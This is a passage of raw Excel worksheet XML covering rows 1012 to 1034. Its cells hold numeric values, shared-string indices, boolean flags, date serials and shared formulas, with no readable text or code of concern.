        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="1012">
      <c r="A1012" s="1">
        <v>13519.0</v>
      </c>
      <c r="B1012" s="2" t="s">
        <v>4399</v>
      </c>
      <c r="C1012" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1012" s="2" t="s">
        <v>4386</v>
      </c>
      <c r="E1012" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1012" s="1" t="s">
        <v>3781</v>
      </c>
      <c r="G1012" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1012" s="1" t="s">
        <v>4400</v>
      </c>
      <c r="I1012" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1012" s="1" t="s">
        <v>4393</v>
      </c>
      <c r="K1012" s="2" t="s">
        <v>4390</v>
      </c>
      <c r="L1012" s="1">
        <v>12.0</v>
      </c>
      <c r="M1012" s="1">
        <v>27.0</v>
      </c>
      <c r="N1012" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O1012" s="1" t="s">
        <v>4394</v>
      </c>
      <c r="P1012" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1012" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1012" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1012" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="1013">
      <c r="A1013" s="1">
        <v>13522.0</v>
      </c>
      <c r="B1013" s="2" t="s">
        <v>4401</v>
      </c>
      <c r="C1013" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1013" s="2" t="s">
        <v>4386</v>
      </c>
      <c r="E1013" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1013" s="1" t="s">
        <v>4402</v>
      </c>
      <c r="G1013" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1013" s="1" t="s">
        <v>4403</v>
      </c>
      <c r="I1013" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1013" s="1" t="s">
        <v>4389</v>
      </c>
      <c r="K1013" s="2" t="s">
        <v>4390</v>
      </c>
      <c r="L1013" s="1">
        <v>4.0</v>
      </c>
      <c r="M1013" s="1">
        <v>7.0</v>
      </c>
      <c r="N1013" s="1" t="s">
        <v>594</v>
      </c>
      <c r="O1013" s="1" t="s">
        <v>4391</v>
      </c>
      <c r="P1013" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1013" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1013" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1013" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1014">
      <c r="A1014" s="1">
        <v>13523.0</v>
      </c>
      <c r="B1014" s="2" t="s">
        <v>4404</v>
      </c>
      <c r="C1014" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1014" s="2" t="s">
        <v>4405</v>
      </c>
      <c r="E1014" s="2" t="s">
        <v>2547</v>
      </c>
      <c r="F1014" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G1014" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1014" s="1" t="s">
        <v>4406</v>
      </c>
      <c r="I1014" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1014" s="1" t="s">
        <v>4393</v>
      </c>
      <c r="K1014" s="2" t="s">
        <v>4390</v>
      </c>
      <c r="L1014" s="1">
        <v>12.0</v>
      </c>
      <c r="M1014" s="1">
        <v>27.0</v>
      </c>
      <c r="N1014" s="1" t="s">
        <v>3947</v>
      </c>
      <c r="O1014" s="1" t="s">
        <v>4394</v>
      </c>
      <c r="P1014" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1014" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1014" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S1014" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="1015">
      <c r="A1015" s="1">
        <v>13524.0</v>
      </c>
      <c r="B1015" s="2" t="s">
        <v>4407</v>
      </c>
      <c r="C1015" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1015" s="2" t="s">
        <v>4386</v>
      </c>
      <c r="E1015" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1015" s="1" t="s">
        <v>4408</v>
      </c>
      <c r="G1015" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1015" s="1" t="s">
        <v>4409</v>
      </c>
      <c r="I1015" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1015" s="1" t="s">
        <v>4393</v>
      </c>
      <c r="K1015" s="2" t="s">
        <v>4390</v>
      </c>
      <c r="L1015" s="1">
        <v>12.0</v>
      </c>
      <c r="M1015" s="1">
        <v>27.0</v>
      </c>
      <c r="N1015" s="1" t="s">
        <v>4410</v>
      </c>
      <c r="O1015" s="1" t="s">
        <v>4394</v>
      </c>
      <c r="P1015" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1015" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1015" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1015" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="1016">
      <c r="A1016" s="1">
        <v>13525.0</v>
      </c>
      <c r="B1016" s="2" t="s">
        <v>4411</v>
      </c>
      <c r="C1016" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1016" s="2" t="s">
        <v>4386</v>
      </c>
      <c r="E1016" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F1016" s="1" t="s">
        <v>4387</v>
      </c>
      <c r="G1016" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1016" s="1" t="s">
        <v>4412</v>
      </c>
      <c r="I1016" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1016" s="1" t="s">
        <v>4393</v>
      </c>
      <c r="K1016" s="2" t="s">
        <v>4390</v>
      </c>
      <c r="L1016" s="1">
        <v>12.0</v>
      </c>
      <c r="M1016" s="1">
        <v>27.0</v>
      </c>
      <c r="N1016" s="1" t="s">
        <v>1521</v>
      </c>
      <c r="O1016" s="1" t="s">
        <v>4394</v>
      </c>
      <c r="P1016" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1016" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1016" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1016" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="1017">
      <c r="A1017" s="1">
        <v>13526.0</v>
      </c>
      <c r="B1017" s="2" t="s">
        <v>4413</v>
      </c>
      <c r="C1017" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1017" s="2" t="s">
        <v>4386</v>
      </c>
      <c r="E1017" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F1017" s="1" t="s">
        <v>4387</v>
      </c>
      <c r="G1017" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1017" s="1" t="s">
        <v>4414</v>
      </c>
      <c r="I1017" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1017" s="1" t="s">
        <v>4393</v>
      </c>
      <c r="K1017" s="2" t="s">
        <v>4390</v>
      </c>
      <c r="L1017" s="1">
        <v>12.0</v>
      </c>
      <c r="M1017" s="1">
        <v>27.0</v>
      </c>
      <c r="N1017" s="1" t="s">
        <v>202</v>
      </c>
      <c r="O1017" s="1" t="s">
        <v>4394</v>
      </c>
      <c r="P1017" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1017" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1017" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1017" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="1018">
      <c r="A1018" s="1">
        <v>13532.0</v>
      </c>
      <c r="B1018" s="2" t="s">
        <v>4415</v>
      </c>
      <c r="C1018" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1018" s="2" t="s">
        <v>4386</v>
      </c>
      <c r="E1018" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1018" s="1" t="s">
        <v>4416</v>
      </c>
      <c r="G1018" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1018" s="1" t="s">
        <v>4417</v>
      </c>
      <c r="I1018" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1018" s="1" t="s">
        <v>4393</v>
      </c>
      <c r="K1018" s="2" t="s">
        <v>4390</v>
      </c>
      <c r="L1018" s="1">
        <v>12.0</v>
      </c>
      <c r="M1018" s="1">
        <v>27.0</v>
      </c>
      <c r="N1018" s="1" t="s">
        <v>4418</v>
      </c>
      <c r="O1018" s="1" t="s">
        <v>4394</v>
      </c>
      <c r="P1018" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1018" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1018" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1018" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="1019">
      <c r="A1019" s="1">
        <v>13534.0</v>
      </c>
      <c r="B1019" s="2" t="s">
        <v>4419</v>
      </c>
      <c r="C1019" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1019" s="2" t="s">
        <v>4386</v>
      </c>
      <c r="E1019" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F1019" s="1" t="s">
        <v>4387</v>
      </c>
      <c r="G1019" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1019" s="4">
        <v>44205.91875</v>
      </c>
      <c r="I1019" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J1019" s="1" t="s">
        <v>4420</v>
      </c>
      <c r="K1019" s="2" t="s">
        <v>4390</v>
      </c>
      <c r="L1019" s="1">
        <v>1.0</v>
      </c>
      <c r="M1019" s="1">
        <v>1.0</v>
      </c>
      <c r="N1019" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1019" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1019" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1019" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1019" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1019" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1020">
      <c r="A1020" s="1">
        <v>13535.0</v>
      </c>
      <c r="B1020" s="2" t="s">
        <v>4421</v>
      </c>
      <c r="C1020" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1020" s="2" t="s">
        <v>4386</v>
      </c>
      <c r="E1020" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1020" s="1" t="s">
        <v>2255</v>
      </c>
      <c r="G1020" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1020" s="4">
        <v>44236.13125</v>
      </c>
      <c r="I1020" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1020" s="1" t="s">
        <v>4393</v>
      </c>
      <c r="K1020" s="2" t="s">
        <v>4390</v>
      </c>
      <c r="L1020" s="1">
        <v>12.0</v>
      </c>
      <c r="M1020" s="1">
        <v>27.0</v>
      </c>
      <c r="N1020" s="1" t="s">
        <v>4422</v>
      </c>
      <c r="O1020" s="1" t="s">
        <v>4394</v>
      </c>
      <c r="P1020" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1020" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1020" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1020" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="1021">
      <c r="A1021" s="1">
        <v>13536.0</v>
      </c>
      <c r="B1021" s="2" t="s">
        <v>4423</v>
      </c>
      <c r="C1021" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1021" s="2" t="s">
        <v>4386</v>
      </c>
      <c r="E1021" s="2" t="s">
        <v>2241</v>
      </c>
      <c r="F1021" s="1" t="s">
        <v>4424</v>
      </c>
      <c r="G1021" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1021" s="4">
        <v>44236.55625</v>
      </c>
      <c r="I1021" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1021" s="1" t="s">
        <v>4393</v>
      </c>
      <c r="K1021" s="2" t="s">
        <v>4390</v>
      </c>
      <c r="L1021" s="1">
        <v>12.0</v>
      </c>
      <c r="M1021" s="1">
        <v>27.0</v>
      </c>
      <c r="N1021" s="1" t="s">
        <v>3503</v>
      </c>
      <c r="O1021" s="1" t="s">
        <v>4394</v>
      </c>
      <c r="P1021" s="1" t="s">
        <v>4425</v>
      </c>
      <c r="Q1021" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1021" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1021" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="1022">
      <c r="A1022" s="1">
        <v>13599.0</v>
      </c>
      <c r="B1022" s="2" t="s">
        <v>2555</v>
      </c>
      <c r="C1022" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1022" s="2" t="s">
        <v>4426</v>
      </c>
      <c r="E1022" s="2" t="s">
        <v>2547</v>
      </c>
      <c r="F1022" s="1" t="s">
        <v>629</v>
      </c>
      <c r="G1022" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1022" s="1" t="s">
        <v>4427</v>
      </c>
      <c r="I1022" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1022" s="1" t="s">
        <v>4428</v>
      </c>
      <c r="K1022" s="2" t="s">
        <v>4429</v>
      </c>
      <c r="L1022" s="1">
        <v>1.0</v>
      </c>
      <c r="M1022" s="1">
        <v>1.0</v>
      </c>
      <c r="N1022" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1022" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1022" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1022" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1022" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S1022" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1023">
      <c r="A1023" s="1">
        <v>14029.0</v>
      </c>
      <c r="B1023" s="2" t="s">
        <v>4430</v>
      </c>
      <c r="C1023" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1023" s="2" t="s">
        <v>4431</v>
      </c>
      <c r="E1023" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1023" s="1" t="s">
        <v>1379</v>
      </c>
      <c r="G1023" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1023" s="4">
        <v>44055.583333333336</v>
      </c>
      <c r="I1023" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1023" s="1" t="s">
        <v>4432</v>
      </c>
      <c r="K1023" s="2" t="s">
        <v>4433</v>
      </c>
      <c r="L1023" s="1">
        <v>4.0</v>
      </c>
      <c r="M1023" s="1">
        <v>10.0</v>
      </c>
      <c r="N1023" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1023" s="1" t="s">
        <v>4434</v>
      </c>
      <c r="P1023" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1023" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1023" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1023" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1024">
      <c r="A1024" s="1">
        <v>14030.0</v>
      </c>
      <c r="B1024" s="2" t="s">
        <v>4435</v>
      </c>
      <c r="C1024" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1024" s="2" t="s">
        <v>4436</v>
      </c>
      <c r="E1024" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1024" s="1" t="s">
        <v>4437</v>
      </c>
      <c r="G1024" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1024" s="4">
        <v>44055.666666666664</v>
      </c>
      <c r="I1024" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1024" s="1" t="s">
        <v>4432</v>
      </c>
      <c r="K1024" s="2" t="s">
        <v>4433</v>
      </c>
      <c r="L1024" s="1">
        <v>4.0</v>
      </c>
      <c r="M1024" s="1">
        <v>10.0</v>
      </c>
      <c r="N1024" s="1" t="s">
        <v>429</v>
      </c>
      <c r="O1024" s="1" t="s">
        <v>4434</v>
      </c>
      <c r="P1024" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1024" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1024" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1024" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1025">
      <c r="A1025" s="1">
        <v>14046.0</v>
      </c>
      <c r="B1025" s="2" t="s">
        <v>4438</v>
      </c>
      <c r="C1025" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1025" s="2" t="s">
        <v>4439</v>
      </c>
      <c r="E1025" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1025" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G1025" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1025" s="4">
        <v>44292.214583333334</v>
      </c>
      <c r="I1025" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J1025" s="1" t="s">
        <v>4440</v>
      </c>
      <c r="K1025" s="2" t="s">
        <v>4441</v>
      </c>
      <c r="L1025" s="1">
        <v>10.0</v>
      </c>
      <c r="M1025" s="1">
        <v>42.0</v>
      </c>
      <c r="N1025" s="1" t="s">
        <v>360</v>
      </c>
      <c r="O1025" s="1" t="s">
        <v>4442</v>
      </c>
      <c r="P1025" s="1" t="s">
        <v>1356</v>
      </c>
      <c r="Q1025" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1025" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1025" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1026">
      <c r="A1026" s="1">
        <v>14098.0</v>
      </c>
      <c r="B1026" s="2" t="s">
        <v>4443</v>
      </c>
      <c r="C1026" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1026" s="2" t="s">
        <v>4444</v>
      </c>
      <c r="E1026" s="2" t="s">
        <v>832</v>
      </c>
      <c r="F1026" s="1" t="s">
        <v>4445</v>
      </c>
      <c r="G1026" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1026" s="4">
        <v>43899.32777777778</v>
      </c>
      <c r="I1026" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1026" s="1" t="s">
        <v>4446</v>
      </c>
      <c r="K1026" s="2" t="s">
        <v>4447</v>
      </c>
      <c r="L1026" s="1">
        <v>5.0</v>
      </c>
      <c r="M1026" s="1">
        <v>7.0</v>
      </c>
      <c r="N1026" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1026" s="1" t="s">
        <v>4448</v>
      </c>
      <c r="P1026" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q1026" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1026" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S1026" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1027">
      <c r="A1027" s="1">
        <v>14099.0</v>
      </c>
      <c r="B1027" s="2" t="s">
        <v>4449</v>
      </c>
      <c r="C1027" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1027" s="2" t="s">
        <v>4444</v>
      </c>
      <c r="E1027" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1027" s="1" t="s">
        <v>4450</v>
      </c>
      <c r="G1027" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1027" s="4">
        <v>43899.34444444445</v>
      </c>
      <c r="I1027" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1027" s="1" t="s">
        <v>4446</v>
      </c>
      <c r="K1027" s="2" t="s">
        <v>4447</v>
      </c>
      <c r="L1027" s="1">
        <v>5.0</v>
      </c>
      <c r="M1027" s="1">
        <v>7.0</v>
      </c>
      <c r="N1027" s="1" t="s">
        <v>1761</v>
      </c>
      <c r="O1027" s="1" t="s">
        <v>4448</v>
      </c>
      <c r="P1027" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1027" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1027" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1027" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1028">
      <c r="A1028" s="1">
        <v>14100.0</v>
      </c>
      <c r="B1028" s="2" t="s">
        <v>4451</v>
      </c>
      <c r="C1028" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1028" s="2" t="s">
        <v>4444</v>
      </c>
      <c r="E1028" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1028" s="1" t="s">
        <v>4445</v>
      </c>
      <c r="G1028" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1028" s="4">
        <v>43899.35833333333</v>
      </c>
      <c r="I1028" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1028" s="1" t="s">
        <v>4446</v>
      </c>
      <c r="K1028" s="2" t="s">
        <v>4447</v>
      </c>
      <c r="L1028" s="1">
        <v>5.0</v>
      </c>
      <c r="M1028" s="1">
        <v>7.0</v>
      </c>
      <c r="N1028" s="1" t="s">
        <v>1547</v>
      </c>
      <c r="O1028" s="1" t="s">
        <v>4448</v>
      </c>
      <c r="P1028" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1028" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1028" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1028" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1029">
      <c r="A1029" s="1">
        <v>14101.0</v>
      </c>
      <c r="B1029" s="2" t="s">
        <v>4452</v>
      </c>
      <c r="C1029" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1029" s="2" t="s">
        <v>4444</v>
      </c>
      <c r="E1029" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1029" s="1" t="s">
        <v>4450</v>
      </c>
      <c r="G1029" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1029" s="4">
        <v>43899.811111111114</v>
      </c>
      <c r="I1029" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1029" s="1" t="s">
        <v>4446</v>
      </c>
      <c r="K1029" s="2" t="s">
        <v>4447</v>
      </c>
      <c r="L1029" s="1">
        <v>5.0</v>
      </c>
      <c r="M1029" s="1">
        <v>7.0</v>
      </c>
      <c r="N1029" s="1" t="s">
        <v>4453</v>
      </c>
      <c r="O1029" s="1" t="s">
        <v>4448</v>
      </c>
      <c r="P1029" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1029" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1029" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1029" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1030">
      <c r="A1030" s="1">
        <v>14102.0</v>
      </c>
      <c r="B1030" s="2" t="s">
        <v>4454</v>
      </c>
      <c r="C1030" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1030" s="2" t="s">
        <v>4444</v>
      </c>
      <c r="E1030" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1030" s="1" t="s">
        <v>4455</v>
      </c>
      <c r="G1030" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1030" s="4">
        <v>43930.94027777778</v>
      </c>
      <c r="I1030" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1030" s="1" t="s">
        <v>4446</v>
      </c>
      <c r="K1030" s="2" t="s">
        <v>4447</v>
      </c>
      <c r="L1030" s="1">
        <v>5.0</v>
      </c>
      <c r="M1030" s="1">
        <v>7.0</v>
      </c>
      <c r="N1030" s="1" t="s">
        <v>4456</v>
      </c>
      <c r="O1030" s="1" t="s">
        <v>4448</v>
      </c>
      <c r="P1030" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1030" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1030" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1030" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1031">
      <c r="A1031" s="1">
        <v>14103.0</v>
      </c>
      <c r="B1031" s="2" t="s">
        <v>4457</v>
      </c>
      <c r="C1031" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1031" s="2" t="s">
        <v>4444</v>
      </c>
      <c r="E1031" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1031" s="1" t="s">
        <v>4458</v>
      </c>
      <c r="G1031" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1031" s="4">
        <v>43991.24930555555</v>
      </c>
      <c r="I1031" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1031" s="1" t="s">
        <v>4446</v>
      </c>
      <c r="K1031" s="2" t="s">
        <v>4447</v>
      </c>
      <c r="L1031" s="1">
        <v>5.0</v>
      </c>
      <c r="M1031" s="1">
        <v>7.0</v>
      </c>
      <c r="N1031" s="1" t="s">
        <v>4459</v>
      </c>
      <c r="O1031" s="1" t="s">
        <v>4448</v>
      </c>
      <c r="P1031" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1031" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1031" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1031" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1032">
      <c r="A1032" s="1">
        <v>14104.0</v>
      </c>
      <c r="B1032" s="2" t="s">
        <v>4460</v>
      </c>
      <c r="C1032" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1032" s="2" t="s">
        <v>4444</v>
      </c>
      <c r="E1032" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1032" s="1" t="s">
        <v>4461</v>
      </c>
      <c r="G1032" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1032" s="4">
        <v>43991.6</v>
      </c>
      <c r="I1032" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1032" s="1" t="s">
        <v>4446</v>
      </c>
      <c r="K1032" s="2" t="s">
        <v>4447</v>
      </c>
      <c r="L1032" s="1">
        <v>5.0</v>
      </c>
      <c r="M1032" s="1">
        <v>7.0</v>
      </c>
      <c r="N1032" s="1" t="s">
        <v>4462</v>
      </c>
      <c r="O1032" s="1" t="s">
        <v>4448</v>
      </c>
      <c r="P1032" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1032" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1032" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1032" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1033">
      <c r="A1033" s="1">
        <v>14130.0</v>
      </c>
      <c r="B1033" s="2" t="s">
        <v>4463</v>
      </c>
      <c r="C1033" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1033" s="2" t="s">
        <v>4464</v>
      </c>
      <c r="E1033" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1033" s="1" t="s">
        <v>4465</v>
      </c>
      <c r="G1033" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1033" s="1" t="s">
        <v>4466</v>
      </c>
      <c r="I1033" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1033" s="1" t="s">
        <v>4467</v>
      </c>
      <c r="K1033" s="2" t="s">
        <v>4468</v>
      </c>
      <c r="L1033" s="1">
        <v>8.0</v>
      </c>
      <c r="M1033" s="1">
        <v>10.0</v>
      </c>
      <c r="N1033" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1033" s="1" t="s">
        <v>4469</v>
      </c>
      <c r="P1033" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1033" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1033" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1033" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1034">
      <c r="A1034" s="1">
        <v>14131.0</v>
      </c>
      <c r="B1034" s="2" t="s">
        <v>4470</v>
      </c>
      <c r="C1034" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1034" s="2" t="s">
        <v>4464</v>
      </c>
      <c r="E1034" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1034" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G1034" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1034" s="1" t="s">
        <v>4471</v>
      </c>
      <c r="I1034" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1034" s="1" t="s">
        <v>4467</v>
      </c>
      <c r="K1034" s="2" t="s">
        <v>4468</v>
      </c>
      <c r="L1034" s="1">
        <v>8.0</v>
      </c>
      <c r="M1034" s="1">
        <v>10.0</v>
      </c>
      <c r="N1034" s="1" t="s">
        <v>4472</v>
      </c>
